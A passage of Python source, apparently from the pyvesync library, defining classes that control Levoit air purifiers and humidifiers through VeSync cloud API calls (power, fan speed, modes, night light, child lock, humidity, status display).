'mode': "manual",
'level': 0,
'display': False,
'child_lock': False,
'night_light': "off"
}
self.config: Dict[str, Union[str, int, float, bool]] = {
'display': False,
'display_forever': False
}
def __build_api_dict(self, method: str) -> Tuple[Dict, Dict]:
"""Build Core200S api call header and body.
Available methods are: 'getPurifierStatus', 'setSwitch',
'setNightLight', 'setLevel', 'setDisplay'
'setPurifierMode', 'setChildLock'
"""
modes = ['getPurifierStatus', 'setSwitch', 'setNightLight',
'setLevel', 'setPurifierMode', 'setDisplay',
'setChildLock']
if method not in modes:
logger.debug('Invalid mode - %s', method)
return {}, {}
head = Helpers.bypass_header()
body = Helpers.bypass_body_v2(self.manager)
body['cid'] = self.cid
body['configModule'] = self.config_module
body['payload'] = {
'method': method,
'source': 'APP'
}
return head, body
def build_purifier_dict(self, dev_dict: Dict):
"""Build Core200S purifier status dictionary."""
self.enabled = dev_dict.get('enabled')
if self.enabled:
self.device_status = 'on'
else:
self.device_status = 'off'
self.details['filter_life'] = dev_dict.get('filter_life', 0)
self.mode = dev_dict.get('mode', 'manual')
self.speed = dev_dict.get('level', 0)
self.details['display'] = dev_dict.get('display', False)
self.details['child_lock'] = dev_dict.get('child_lock', False)
self.details['night_light'] = dev_dict.get('night_light', 'off')
self.details['display'] = dev_dict.get('display', False)
self.details['display_forever'] = dev_dict.get('display_forever',
False)
def build_config_dict(self, conf_dict):
"""Build configuration dict for Core200S purifier."""
self.config['display'] = conf_dict.get('display', False)
self.config['display_forever'] = conf_dict.get('display_forever',
False)
def get_details(self) -> None:
"""Build Core200S Purifier details dictionary."""
head = Helpers.bypass_header()
body = Helpers.bypass_body_v2(self.manager)
body['cid'] = self.cid
body['configModule'] = self.config_module
body['payload'] = {
'method': 'getPurifierStatus',
'source': 'APP',
'data': {}
}
r, _ = Helpers.call_api(
'/cloud/v2/deviceManaged/bypassV2',
method='post',
headers=head,
json=body,
)
outer_result = r.get('result', {})
inner_result = None
if outer_result:
inner_result = r.get('result', {}).get('result')
if inner_result is not None and Helpers.code_check(r):
if outer_result.get('code') == 0:
self.build_purifier_dict(inner_result)
else:
logger.debug('error in inner result dict from purifier')
if inner_result.get('configuration', {}):
self.build_config_dict(inner_result.get('configuration', {}))
else:
logger.debug('No configuration found in purifier status')
else:
logger.debug('Error in purifier response')
def update(self):
"""Update Core200S Purifier details."""
self.get_details()
@property
def fan_level(self) -> int:
"""Get current fan level (1-3)."""
return int(self.speed)
@property
def filter_life(self) -> int:
"""Get percentage of filter life remaining."""
try:
return int(self.details['filter_life'])
except KeyError:
return 0
@property
def display_state(self) -> bool:
"""Get display state."""
return bool(self.details['display'])
@property
def child_lock(self) -> bool:
"""Get child lock state."""
return bool(self.details['child_lock'])
@property
def night_light(self) -> str:
"""Get night light state (on/dim/off)."""
return str(self.details['night_light'])
def toggle_switch(self, toggle: bool) -> bool:
"""Toggle purifier on/off."""
if not isinstance(toggle, bool):
logger.debug('Invalid toggle value for purifier switch')
return False
head = Helpers.bypass_header()
body = Helpers.bypass_body_v2(self.manager)
body['cid'] = self.cid
body['configModule'] = self.config_module
body['payload'] = {
'data': {
'enabled': toggle,
'id': 0
},
'method': 'setSwitch',
'source': 'APP'
}
r, _ = Helpers.call_api(
'/cloud/v2/deviceManaged/bypassV2',
method='post',
headers=head,
json=body,
)
if Helpers.code_check(r):
return True
logger.debug("Error toggling Core200S purifier - %s",
self.device_name)
return False
def turn_on(self) -> bool:
"""Turn Core200S Purifier on."""
return self.toggle_switch(True)
def turn_off(self):
"""Turn Core200S Purifier off."""
return self.toggle_switch(False)
def child_lock_on(self) -> bool:
"""Turn Core200S child lock on."""
return self.set_child_lock(True)
def child_lock_off(self) -> bool:
"""Turn Core200S child lock off."""
return self.set_child_lock(False)
def set_child_lock(self, mode: bool) -> bool:
"""Set Core200S child lock."""
if mode not in (True, False):
logger.debug('Invalid mode passed to set_child_lock - %s', mode)
return False
head, body = self.__build_api_dict('setChildLock')
if not head and not body:
return False
body['payload']['data'] = {
'child_lock': mode
}
r, _ = Helpers.call_api(
'/cloud/v2/deviceManaged/bypassV2',
method='post',
headers=head,
json=body,
)
if r is not None and Helpers.code_check(r):
self.details['child_lock'] = mode
return True
if isinstance(r, dict):
logger.debug('Error toggling child lock')
else:
logger.debug('Error in api return json for %s', self.device_name)
return False
def set_display(self, mode: bool) -> bool:
"""Toggle display on/off."""
if not isinstance(mode, bool):
logger.debug("Mode must be True or False")
return False
head, body = self.__build_api_dict('setDisplay')
body['payload']['data'] = {
'state': mode
}
r, _ = Helpers.call_api(
'/cloud/v2/deviceManaged/bypassV2',
method='post',
headers=head,
json=body,
)
if Helpers.code_check(r):
return True
logger.debug("Error toggling Core200S display - %s",
self.device_name)
return False
def turn_on_display(self) -> bool:
"""Turn Display on."""
return self.set_display(True)
def turn_off_display(self):
"""Turn Display off."""
return self.set_display(False)
def change_fan_speed(self, speed: int = None) -> bool:
"""1,2,3 or call without argument to increment by 1."""
if self.mode != 'manual':
logger.debug('%s not in manual mode, cannot change speed',
self.device_name)
return False
try:
level = int(self.speed)
except KeyError:
logger.debug(
'Cannot change fan speed, no level set for %s',
self.device_name
)
return False
body = Helpers.req_body(self.manager, 'devicestatus')
body['uuid'] = self.uuid
head = Helpers.req_headers(self.manager)
if speed is not None:
if speed == level:
return True
if speed in [1, 2, 3]:
level = speed
else:
logger.debug('Invalid fan speed for %s',
self.device_name)
return False
else:
if (level + 1) > 3:
level = 1
else:
level = int(level + 1)
head, body = self.__build_api_dict('setLevel')
if not head and not body:
return False
body['payload']['data'] = {
'id': 0,
'level': level,
'type': 'wind'
}
r, _ = Helpers.call_api(
'/cloud/v2/deviceManaged/bypassV2',
method='post',
headers=head,
json=body,
)
if r is not None and Helpers.code_check(r):
self.speed = level
return True
logger.warning('Error changing %s speed', self.device_name)
return False
def set_night_light(self, mode: str) -> bool:
"""Set night list - on, off or dim."""
if mode.lower() not in ['on', 'off', 'dim']:
logger.debug('Invalid nightlight mode used (on, off or dim)- %s',
mode)
return False
head, body = self.__build_api_dict('setNightLight')
if not head and not body:
return False
body['payload']['data'] = {
'night_light': mode.lower()
}
r, _ = Helpers.call_api(
'/cloud/v2/deviceManaged/bypassV2',
method='post',
headers=head,
json=body,
)
if r is not None and Helpers.code_check(r):
self.details['night_light'] = mode.lower()
return True
logger.debug('Error setting nightlight mode')
return False
def mode_toggle(self, mode: str) -> bool:
"""Set purifier mode - sleep or manual."""
if mode.lower() not in ['sleep', 'manual']:
logger.debug('Invalid purifier mode used (sleep or manual)- %s',
mode)
return False
head, body = self.__build_api_dict('setPurifierMode')
if not head and not body:
return False
body['payload']['data'] = {
'mode': mode.lower()
}
r, _ = Helpers.call_api(
'/cloud/v2/deviceManaged/bypassV2',
method='post',
headers=head,
json=body,
)
if Helpers.code_check(r):
return True
logger.debug('Error setting purifier mode')
return False
def manual_mode(self) -> bool:
"""Set mode to manual."""
return self.mode_toggle('manual')
def sleep_mode(self) -> bool:
"""Set sleep mode to on."""
return self.mode_toggle('sleep')
def display(self) -> None:
"""Return formatted device info to stdout."""
super().display()
disp1 = [
('Mode: ', self.mode, ''),
('Filter Life: ', self.details['filter_life'], 'percent'),
('Fan Level: ', self.speed, ''),
('Display: ', self.details['display'], ''),
('Child Lock: ', self.details['child_lock'], ''),
('Night Light: ', self.details['night_light'], ''),
('Display Config: ', self.config['display'], ''),
('Display_Forever Config: ', self.config['display_forever'], '')
]
for line in disp1:
print(f'{line[0]:.<20} {line[0]} {line[0]}')
def displayJSON(self) -> str:
"""Return air purifier status and properties in JSON output."""
sup = super().displayJSON()
sup_val = json.loads(sup)
sup_val.update(
{
'Mode': self.mode,
'Filter Life': str(self.details['filter_life']),
'Fan Level': str(self.speed),
'Display': self.details['display'],
'Child Lock': self.details['child_lock'],
'Night Light': str(self.details['night_light']),
'Display Config': self.config['display'],
'Display_Forever Config': self.config['display_forever'],
}
)
return json.dumps(sup_val)
class VeSyncAir300S400S(VeSyncBaseDevice):
"""Core300S/400S Purifier Class."""
def __init__(self, details, manager):
"""Initilize Core300S/400S Purifier class."""
super().__init__(details, manager)
self.enabled = True
self.details: Dict[str, Union[str, int, float, bool]] = {
'filter_life': 0,
'mode': 'manual',
'level': 0,
'air_quality': 0,
'display': False,
'child_lock': False,
'night_light': 'off',
}
self.config: Dict[str, Union[str, int, float, bool]] = {
'display': False,
'display_forever': False,
}
def __build_api_dict(self, method: str) -> Tuple[Dict, Dict]:
"""Build Core300S/400S api call header and body.
Available methods are: 'getPurifierStatus', 'setSwitch',
'setNightLight', 'setLevel', 'setDisplay'
'setPurifierMode', 'setChildLock'
"""
modes = ['getPurifierStatus', 'setSwitch', 'setNightLight',
'setLevel', 'setPurifierMode', 'setDisplay',
'setChildLock']
if method not in modes:
logger.debug('Invalid mode - %s', method)
return {}, {}
head = Helpers.bypass_header()
body = Helpers.bypass_body_v2(self.manager)
body['cid'] = self.cid
body['configModule'] = self.config_module
body['payload'] = {
'method': method,
'source': 'APP',
}
return head, body
def build_purifier_dict(self, dev_dict: Dict):
"""Build Core300S/400S purifier status dictionary."""
self.enabled = dev_dict.get('enabled')
if self.enabled:
self.device_status = 'on'
else:
self.device_status = 'off'
self.details['filter_life'] = dev_dict.get('filter_life', 0)
self.details['air_quality'] = dev_dict.get('air_quality_value', 0)
self.mode = dev_dict.get('mode', 'manual')
self.speed = dev_dict.get('level', 0)
self.details['display'] = dev_dict.get('display', False)
self.details['child_lock'] = dev_dict.get('child_lock', False)
self.details['night_light'] = dev_dict.get('night_light', 'off')
self.details['display'] = dev_dict.get('display', False)
self.details['display_forever'] = dev_dict.get('display_forever',
False)
def build_config_dict(self, conf_dict):
"""Build configuration dict for Core200S/300S purifier."""
self.config['display'] = conf_dict.get('display', False)
self.config['display_forever'] = conf_dict.get('display_forever',
False)
def get_details(self) -> None:
"""Build Core300S/400S Purifier details dictionary."""
head = Helpers.bypass_header()
body = Helpers.bypass_body_v2(self.manager)
body['cid'] = self.cid
body['configModule'] = self.config_module
body['payload'] = {
'method': 'getPurifierStatus',
'source': 'APP',
'data': {}
}
r, _ = Helpers.call_api(
'/cloud/v2/deviceManaged/bypassV2',
method='post',
headers=head,
json=body,
)
outer_result = r.get('result', {})
inner_result = None
if outer_result:
inner_result = r.get('result', {}).get('result')
if inner_result is not None and Helpers.code_check(r):
if outer_result.get('code') == 0:
self.build_purifier_dict(inner_result)
else:
logger.debug('error in inner result dict from purifier')
if inner_result.get('configuration', {}):
self.build_config_dict(inner_result.get('configuration', {}))
else:
logger.debug('No configuration found in purifier status')
else:
logger.debug('Error in purifier response')
def update(self):
"""Update Core300S/400S Purifier details."""
self.get_details()
@property
def fan_level(self) -> int:
"""Get current fan level (1-4)."""
return int(self.speed)
@property
def filter_life(self) -> int:
"""Get percentage of filter life remaining."""
try:
return int(self.details['filter_life'])
except KeyError:
return 0
@property
def air_quality(self) -> int:
"""Get air quality value (ug/m3)."""
try:
return int(self.details['air_quality'])
except KeyError:
return 0
@property
def display_state(self) -> bool:
"""Get display state."""
return bool(self.details['display'])
@property
def child_lock(self) -> bool:
"""Get child lock state."""
return bool(self.details['child_lock'])
@property
def night_light(self) -> str:
"""Get night light state (on/dim/off)."""
return str(self.details['night_light'])
def toggle_switch(self, toggle: bool) -> bool:
"""Toggle purifier on/off."""
if not isinstance(toggle, bool):
logger.debug('Invalid toggle value for purifier switch')
return False
head = Helpers.bypass_header()
body = Helpers.bypass_body_v2(self.manager)
body['cid'] = self.cid
body['configModule'] = self.config_module
body['payload'] = {
'data': {
'enabled': toggle,
'id': 0
},
'method': 'setSwitch',
'source': 'APP'
}
r, _ = Helpers.call_api(
'/cloud/v2/deviceManaged/bypassV2',
method='post',
headers=head,
json=body,
)
if Helpers.code_check(r):
return True
logger.debug("Error toggling Core200S/300S purifier - %s",
self.device_name)
return False
def turn_on(self) -> bool:
"""Turn Core300S/400S Purifier on."""
return self.toggle_switch(True)
def turn_off(self):
"""Turn Core300S/400S Purifier off."""
return self.toggle_switch(False)
def child_lock_on(self) -> bool:
"""Turn Core300S/400S child lock on."""
return self.set_child_lock(True)
def child_lock_off(self) -> bool:
"""Turn Core300S/400S child lock off."""
return self.set_child_lock(False)
def set_child_lock(self, mode: bool) -> bool:
"""Set Core300S/400S child lock."""
if mode not in (True, False):
logger.debug('Invalid mode passed to set_child_lock - %s', mode)
return False
head, body = self.__build_api_dict('setChildLock')
if not head and not body:
return False
body['payload']['data'] = {
'child_lock': mode
}
r, _ = Helpers.call_api(
'/cloud/v2/deviceManaged/bypassV2',
method='post',
headers=head,
json=body,
)
if r is not None and Helpers.code_check(r):
self.details['child_lock'] = mode
return True
if isinstance(r, dict):
logger.debug('Error toggling child lock')
else:
logger.debug('Error in api return json for %s', self.device_name)
return False
def set_display(self, mode: bool) -> bool:
"""Toggle display on/off."""
if not isinstance(mode, bool):
logger.debug("Mode must be True or False")
return False
head, body = self.__build_api_dict('setDisplay')
body['payload']['data'] = {
'state': mode
}
r, _ = Helpers.call_api(
'/cloud/v2/deviceManaged/bypassV2',
method='post',
headers=head,
json=body,
)
if Helpers.code_check(r):
return True
logger.debug("Error toggling Core200S/300S display - %s",
self.device_name)
return False
def turn_on_display(self) -> bool:
"""Turn Display on."""
return self.set_display(True)
def turn_off_display(self):
"""Turn Display off."""
return self.set_display(False)
def change_fan_speed(self, speed: int = None) -> bool:
"""1,2,3,4 or call without argument to increment by 1."""
if self.mode != 'manual':
logger.debug('%s not in manual mode, cannot change speed',
self.device_name)
return False
try:
level = int(self.speed)
except KeyError:
logger.debug(
'Cannot change fan speed, no level set for %s',
self.device_name,
)
return False
body = Helpers.req_body(self.manager, 'devicestatus')
body['uuid'] = self.uuid
head = Helpers.req_headers(self.manager)
if speed is not None:
if speed == level:
return True
if speed in [1, 2, 3, 4]:
level = speed
else:
logger.debug('Invalid fan speed for %s',
self.device_name)
return False
else:
if (level + 1) > 4:
level = 1
else:
level = int(level + 1)
head, body = self.__build_api_dict('setLevel')
if not head and not body:
return False
body['payload']['data'] = {
'id': 0,
'level': level,
'type': 'wind',
}
r, _ = Helpers.call_api(
'/cloud/v2/deviceManaged/bypassV2',
method='post',
headers=head,
json=body,
)
if r is not None and Helpers.code_check(r):
self.speed = level
return True
logger.warning('Error changing %s speed', self.device_name)
return False
def set_night_light(self, mode: str) -> bool:
"""Set night list - on, off or dim."""
if mode.lower() not in ['on', 'off', 'dim']:
logger.debug('Invalid nightlight mode used (on, off or dim)- %s',
mode)
return False
head, body = self.__build_api_dict('setNightLight')
if not head and not body:
return False
body['payload']['data'] = {
'night_light': mode.lower()
}
r, _ = Helpers.call_api(
'/cloud/v2/deviceManaged/bypassV2',
method='post',
headers=head,
json=body,
)
if r is not None and Helpers.code_check(r):
self.details['night_light'] = mode.lower()
return True
logger.debug('Error setting nightlight mode')
return False
def mode_toggle(self, mode: str) -> bool:
"""Set purifier mode - sleep or manual or auto."""
if mode.lower() not in ['sleep', 'manual', 'auto']:
logger.debug(
'Invalid purifier mode used (sleep or manual or auto)- %s',
mode,
)
return False
head, body = self.__build_api_dict('setPurifierMode')
if not head and not body:
return False
body['payload']['data'] = {
'mode': mode.lower()
}
r, _ = Helpers.call_api(
'/cloud/v2/deviceManaged/bypassV2',
method='post',
headers=head,
json=body,
)
if Helpers.code_check(r):
return True
logger.debug('Error setting purifier mode')
return False
def auto_mode(self) -> bool:
"""Set mode to auto."""
return self.mode_toggle('auto')
def manual_mode(self) -> bool:
"""Set mode to manual."""
return self.mode_toggle('manual')
def sleep_mode(self) -> bool:
"""Set sleep mode to on."""
return self.mode_toggle('sleep')
def display(self) -> None:
"""Return formatted device info to stdout."""
super().display()
disp1 = [
('Mode: ', self.mode, ''),
('Filter Life: ', self.details['filter_life'], 'percent'),
('Air Quality: ', self.details['air_quality'], 'ug/m3'),
('Fan Level: ', self.speed, ''),
('Display: ', self.details['display'], ''),
('Child Lock: ', self.details['child_lock'], ''),
('Night Light: ', self.details['night_light'], ''),
('Display Config: ', self.config['display'], ''),
('Display_Forever Config: ', self.config['display_forever'], ''),
]
for line in disp1:
print(f'{line[0]:.<20} {line[1]} {line[2]}')
def displayJSON(self) -> str:
"""Return air purifier status and properties in JSON output."""
sup = super().displayJSON()
sup_val = json.loads(sup)
sup_val.update(
{
'Mode': self.mode,
'Filter Life': str(self.details['filter_life']),
'Air Quality': str(self.details['air_quality']),
'Fan Level': str(self.speed),
'Display': self.details['display'],
'Child Lock': self.details['child_lock'],
'Night Light': str(self.details['night_light']),
'Display Config': self.config['display'],
'Display_Forever Config': self.config['display_forever'],
}
)
return json.dumps(sup_val)
class VeSyncAir131(VeSyncBaseDevice):
"""Levoit Air Purifier Class."""
def __init__(self, details, manager):
"""Initilize air purifier class."""
super().__init__(details, manager)
self.details: Dict = {}
def get_details(self) -> None:
"""Build Air Purifier details dictionary."""
body = Helpers.req_body(self.manager, 'devicedetail')
body['uuid'] = self.uuid
head = Helpers.req_headers(self.manager)
r, _ = Helpers.call_api(
'/131airPurifier/v1/device/deviceDetail',
method='post',
headers=head,
json=body,
)
if r is not None and Helpers.code_check(r):
self.device_status = r.get('deviceStatus', 'unknown')
self.connection_status = r.get('connectionStatus', 'unknown')
self.details['active_time'] = r.get('activeTime', 0)
self.details['filter_life'] = r.get('filterLife', {})
self.details['screen_status'] = r.get('screenStatus', 'unknown')
self.mode = r.get('mode', self.mode)
self.details['level'] = r.get('level', 0)
self.details['air_quality'] = r.get('airQuality', 'unknown')
else:
logger.debug('Error getting %s details', self.device_name)
def get_config(self) -> None:
"""Get configuration info for air purifier."""
body = Helpers.req_body(self.manager, 'devicedetail')
body['method'] = 'configurations'
body['uuid'] = self.uuid
r, _ = Helpers.call_api(
'/131airpurifier/v1/device/configurations',
'post',
headers=Helpers.req_headers(self.manager),
json=body,
)
if Helpers.code_check(r):
self.config = Helpers.build_config_dict(r)
else:
logger.warning('Unable to get config info for %s',
self.device_name)
@property
def active_time(self) -> int:
"""Return total time active in minutes."""
return self.details.get('active_time', 0)
@property
def fan_level(self) -> int:
"""Get current fan level (1-3)."""
return self.details.get('level', 0)
@property
def filter_life(self) -> int:
"""Get percentage of filter life remaining."""
try:
return self.details['filter_life'].get('percent', 0)
except KeyError:
return 0
@property
def air_quality(self) -> str:
"""Get Air Quality."""
return self.details.get('air_quality', 'unknown')
@property
def screen_status(self) -> str:
"""Return Screen status (on/off)."""
return self.details.get('screen_status', 'unknown')
def turn_on(self) -> bool:
"""Turn Air Purifier on."""
if self.device_status != 'on':
body = Helpers.req_body(self.manager, 'devicestatus')
body['uuid'] = self.uuid
body['status'] = 'on'
head = Helpers.req_headers(self.manager)
r, _ = Helpers.call_api(
'/131airPurifier/v1/device/deviceStatus', 'put',
json=body, headers=head
)
if r is not None and Helpers.code_check(r):
self.device_status = 'on'
return True
logger.warning('Error turning %s on', self.device_name)
return False
return False
def turn_off(self) -> bool:
"""Turn Air Purifier Off."""
if self.device_status == 'on':
body = Helpers.req_body(self.manager, 'devicestatus')
body['uuid'] = self.uuid
body['status'] = 'off'
head = Helpers.req_headers(self.manager)
r, _ = Helpers.call_api(
'/131airPurifier/v1/device/deviceStatus', 'put',
json=body, headers=head
)
if r is not None and Helpers.code_check(r):
self.device_status = 'off'
return True
logger.warning('Error turning %s off', self.device_name)
return False
return True
def auto_mode(self) -> bool:
"""Set mode to auto."""
return self.mode_toggle('auto')
def manual_mode(self) -> bool:
"""Set mode to manual."""
return self.mode_toggle('manual')
def sleep_mode(self) -> bool:
"""Set sleep mode to on."""
return self.mode_toggle('sleep')
def change_fan_speed(self, speed: int = None) -> bool:
"""Adjust Fan Speed for air purifier.
Specifying 1,2,3 as argument or call without argument to cycle
through speeds increasing by one.
"""
if self.mode != 'manual':
logger.debug('%s not in manual mode, cannot change speed',
self.device_name)
return False
try:
level = self.details['level']
except KeyError:
logger.debug(
'Cannot change fan speed, no level set for %s',
self.device_name
)
return False
body = Helpers.req_body(self.manager, 'devicestatus')
body['uuid'] = self.uuid
head = Helpers.req_headers(self.manager)
if speed is not None:
if speed == level:
return True
if speed in [1, 2, 3]:
body['level'] = speed
else:
logger.debug('Invalid fan speed for %s',
self.device_name)
return False
else:
if (level + 1) > 3:
body['level'] = 1
else:
body['level'] = int(level + 1)
r, _ = Helpers.call_api(
'/131airPurifier/v1/device/updateSpeed', 'put',
json=body, headers=head
)
if r is not None and Helpers.code_check(r):
self.details['level'] = body['level']
return True
logger.warning('Error changing %s speed', self.device_name)
return False
def mode_toggle(self, mode: str) -> bool:
"""Set mode to manual, auto or sleep."""
head = Helpers.req_headers(self.manager)
body = Helpers.req_body(self.manager, 'devicestatus')
body['uuid'] = self.uuid
if mode != self.mode and mode in ['sleep', 'auto', 'manual']:
body['mode'] = mode
if mode == 'manual':
body['level'] = 1
r, _ = Helpers.call_api(
'/131airPurifier/v1/device/updateMode', 'put',
json=body, headers=head
)
if r is not None and Helpers.code_check(r):
self.mode = mode
return True
logger.warning('Error setting %s mode - %s', self.device_name, mode)
return False
def update(self) -> None:
"""Run function to get device details."""
self.get_details()
def display(self) -> None:
"""Return formatted device info to stdout."""
super().display()
disp1 = [
('Active Time : ', self.active_time, ' minutes'),
('Fan Level: ', self.fan_level, ''),
('Air Quality: ', self.air_quality, ''),
('Mode: ', self.mode, ''),
('Screen Status: ', self.screen_status, ''),
('Filter Life: ', self.filter_life, ' percent'),
]
for line in disp1:
print(f'{line[0]:.<15} {line[1]} {line[2]}')
def displayJSON(self) -> str:
"""Return air purifier status and properties in JSON output."""
sup = super().displayJSON()
sup_val = json.loads(sup)
sup_val.update(
{
'Active Time': str(self.active_time),
'Fan Level': self.fan_level,
'Air Quality': self.air_quality,
'Mode': self.mode,
'Screen Status': self.screen_status,
'Filter Life': str(self.filter_life),
}
)
return sup_val
class VeSyncHumid200300S(VeSyncBaseDevice):
"""200S/300S Humidifier Class."""
def __init__(self, details, manager):
"""Initialize 200S/300S Humidifier class."""
super().__init__(details, manager)
self.enabled = True
if 'nightlight' in air_features.get(details['deviceType']):
self.night_light = True
else:
self.night_light = False
self.details: Dict[str, Union[str, int, float]] = {
'humidity': 0,
'mist_virtual_level': 0,
'mist_level': 0,
'mode': 'manual',
'water_lacks': False,
'humidity_high': False,
'water_tank_lifted': False,
'display': False,
'automatic_stop_reach_target': False,
}
if self.night_light:
self.details['night_light_brightness'] = 0
self.config: Dict[str, Union[str, int, float]] = {
'auto_target_humidity': 0,
'display': False,
'automatic_stop': True
}
def __build_api_dict(self, method: str) -> Tuple[Dict, Dict]:
"""Build 200S/300S api call header and body.
Available methods are: 'getHumidifierStatus', 'setAutomaticStop',
'setSwitch', 'setNightLightBrightness', 'setVirtualLevel',
'setTargetHumidity', 'setHumidityMode'
"""
modes = ['getHumidifierStatus', 'setAutomaticStop',
'setSwitch', 'setNightLightBrightness', 'setVirtualLevel',
'setTargetHumidity', 'setHumidityMode', 'setDisplay']
if method not in modes:
logger.debug('Invalid mode - %s', method)
return {}, {}
head = Helpers.bypass_header()
body = Helpers.bypass_body_v2(self.manager)
body['cid'] = self.cid
body['configModule'] = self.config_module
body['payload'] = {
'method': method,
'source': 'APP'
}
return head, body
def build_humid_dict(self, dev_dict: Dict):
"""Build 200S/300S humidifier status dictionary."""
self.enabled = dev_dict.get('enabled')
self.details['humidity'] = dev_dict.get('humidity', 0)
self.details['mist_virtual_level'] = dev_dict.get(
'mist_virtual_level', 0)
self.details['mist_level'] = dev_dict.get('mist_level', 0)
self.details['mode'] = dev_dict.get('mode', 'manual')
self.details['water_lacks'] = dev_dict.get('water_lacks', False)
self.details['humidity_high'] = dev_dict.get('humidity_high', False)
self.details['water_tank_lifted'] = dev_dict.get(
'water_tank_lifted', False)
self.details['display'] = dev_dict.get('display', False)
self.details['automatic_stop_reach_target'] = dev_dict.get(
'automatic_stop_reach_target', True
)
if self.night_light:
self.details['night_light_brightness'] = dev_dict.get(
'night_light_brightness', 0)
def build_config_dict(self, conf_dict):
"""Build configuration dict for 300s humidifier."""
self.config['auto_target_humidity'] = conf_dict.get(
'auto_target_humidity', 0)
self.config['display'] = conf_dict.get('display', False)
self.config['automatic_stop'] = conf_dict.get('automatic_stop', True)
def get_details(self) -> None:
"""Build 200S/300S Humidifier details dictionary."""
head = Helpers.bypass_header()
body = Helpers.bypass_body_v2(self.manager)
body['cid'] = self.cid
body['configModule'] = self.config_module
body['payload'] = {
'method': 'getHumidifierStatus',
'source': 'APP',
'data': {}
}
r, _ = Helpers.call_api(
'/cloud/v2/deviceManaged/bypassV2',
method='post',
headers=head,
json=body,
)
outer_result = r.get('result', {})
inner_result = None
if outer_result is not None:
inner_result = r.get('result', {}).get('result')
if inner_result is not None and Helpers.code_check(r):
if outer_result.get('code') == 0:
self.build_humid_dict(inner_result)
else:
logger.debug('error in inner result dict from humidifier')
if inner_result.get('configuration', {}):
self.build_config_dict(inner_result.get('configuration', {}))
else:
logger.debug('No configuration found in humidifier status')
else:
logger.debug('Error in humidifier response')
def update(self):
"""Update 200S/300S Humidifier details."""
self.get_details()
def toggle_switch(self, toggle: bool) -> bool:
"""Toggle humidifier on/off."""
if not isinstance(toggle, bool):
logger.debug('Invalid toggle value for humidifier switch')
return False
head = Helpers.bypass_header()
body = Helpers.bypass_body_v2(self.manager)
body['cid'] = self.cid
body['configModule'] = self.config_module
body['payload'] = {
'data': {
'enabled': toggle,
'id': 0
},
'method': 'setSwitch',
'source': 'APP'
}
r, _ = Helpers.call_api(
'/cloud/v2/deviceManaged/bypassV2',
method='post',
headers=head,
json=body,
)
if Helpers.code_check(r):
return True
logger.debug("Error toggling 300S humidifier - %s", self.device_name)
return False
def turn_on(self) -> bool:
"""Turn 200S/300S Humidifier on."""
return self.toggle_switch(True)
def turn_off(self):
"""Turn 200S/300S Humidifier off."""
return self.toggle_switch(False)
def automatic_stop_on(self) -> bool:
"""Turn 200S/300S Humidifier automatic stop on."""
return self.set_automatic_stop(True)
def automatic_stop_off(self) -> bool:
"""Turn 200S/300S Humidifier automatic stop on."""
return self.set_automatic_stop(False)
def set_automatic_stop(self, mode: bool) -> bool:
"""Set 200S/300S Humidifier to automatic stop."""
if mode not in (True, False):
logger.debug(
'Invalid mode passed to set_automatic_stop - %s', mode)
return False
head, body = self.__build_api_dict('setAutomaticStop')
if not head and not body:
return False
body['payload']['data'] = {
'enabled': mode
}
r, _ = Helpers.call_api(
'/cloud/v2/deviceManaged/bypassV2',
method='post',
headers=head,
json=body,
)
if Helpers.code_check(r):
return True
if isinstance(r, dict):
logger.debug('Error toggling automatic stop')
else:
logger.debug('Error in api return json for %s', self.device_name)
return False
def set_display(self, mode: bool) -> bool:
"""Toggle display on/off."""
if not isinstance(mode, bool):
logger.debug("Mode must be True or False")
return False
head, body = self.__build_api_dict('setDisplay')
body['payload']['data'] = {
'state': mode
}
r, _ = Helpers.call_api(
'/cloud/v2/deviceManaged/bypassV2',
method='post',
headers=head,
json=body,
)
if Helpers.code_check(r):
return True
logger.debug("Error toggling 300S display - %s", self.device_name)
return False
def turn_on_display(self) -> bool:
"""Turn 200S/300S Humidifier on."""
return self.set_display(True)
def turn_off_display(self):
"""Turn 200S/300S Humidifier off."""
return self.set_display(False)
def set_humidity(self, humidity: int) -> bool:
"""Set target 200S/300S Humidifier humidity."""
if humidity < 30 or humidity > 80:
logger.debug("Humidity value must be set between 30 and 80")
return False
head, body = self.__build_api_dict('setTargetHumidity')
if not head and not body:
return False
body['payload']['data'] = {
'target_humidity': humidity
}
r, _ = Helpers.call_api(
'/cloud/v2/deviceManaged/bypassV2',
method='post',
headers=head,
json=body,
)
if Helpers.code_check(r):
return True
logger.debug('Error setting humidity')
return False
def set_night_light_brightness(self, brightness: int) -> bool:
"""Set target 200S/300S Humidifier night light brightness."""
if not self.night_light:
logger.debug('%s is a %s does not have a nightlight',
self.device_name, self.device_type)
return False
if brightness < 0 or brightness > 100:
logger.debug("Brightness value must be set between 0 and 100")
return False
head, body = self.__build_api_dict('setNightLightBrightness')
if not head and not body:
return False
body['payload']['data'] = {
'night_light_brightness': brightness
}
r, _ = Helpers.call_api(
'/cloud/v2/deviceManaged/bypassV2',
method='post',
headers=head,
json=body,
)
if Helpers.code_check(r):
return True
logger.debug('Error setting humidity')
return False
def set_humidity_mode(self, mode: str) -> bool:
"""Set humidifier mode - sleep or auto."""
if mode.lower() not in ['sleep', 'auto']:
logger.debug('Invalid humidity mode used (sleep or auto)- %s',
mode)
return False
head, body = self.__build_api_dict('setHumidityMode')
if not head and not body:
return False
body['payload']['data'] = {
'mode': mode.lower()
}
r, _ = Helpers.call_api(
'/cloud/v2/deviceManaged/bypassV2',
method='post',
headers=head,
json=body,
)
if Helpers.code_check(r):
return True
logger.debug('Error setting humidity mode')
return False
def set_mist_level(self, level: int) -> bool:
"""Set humidifier mist level with int between 0 - 9."""
if level < 1 or level > 9:
logger.debug('Humidifier mist level must be between 0 and 9')
return False
head, body = self.__build_api_dict('setVirtualLevel')
if not head and not body:
return False
body['payload']['data'] = {
'id': 0,
'level': level,
'type': 'mist'
}
r, _ = Helpers.call_api(
'/cloud/v2/deviceManaged/bypassV2',
method='post',
headers=head,
json=body,
)
if Helpers.code_check(r):
return True
logger.debug('Error setting mist level')
return False
def display(self) -> None:
"""Return formatted device info to stdout."""
super().display()
disp1 = [
('Mode: ', self.details['mode'], ''),
('Humidity: ', self.details['humidity'], 'percent'),
('Mist Virtual Level: ', self.details['mist_virtual_level'], ''),
('Mist Level: ', self.details['mist_level'], ''),
('Water Lacks: ', self.details['water_lacks'], ''),
('Humidity High: ', self.details['humidity_high'], ''),
('Water Tank Lifted: ', self.details['water_tank_lifted'], ''),
('Display: ', self.details['display'], ''),
('Automatic Stop Reach Target: ',
self.details['automatic_stop_reach_target'], ''),
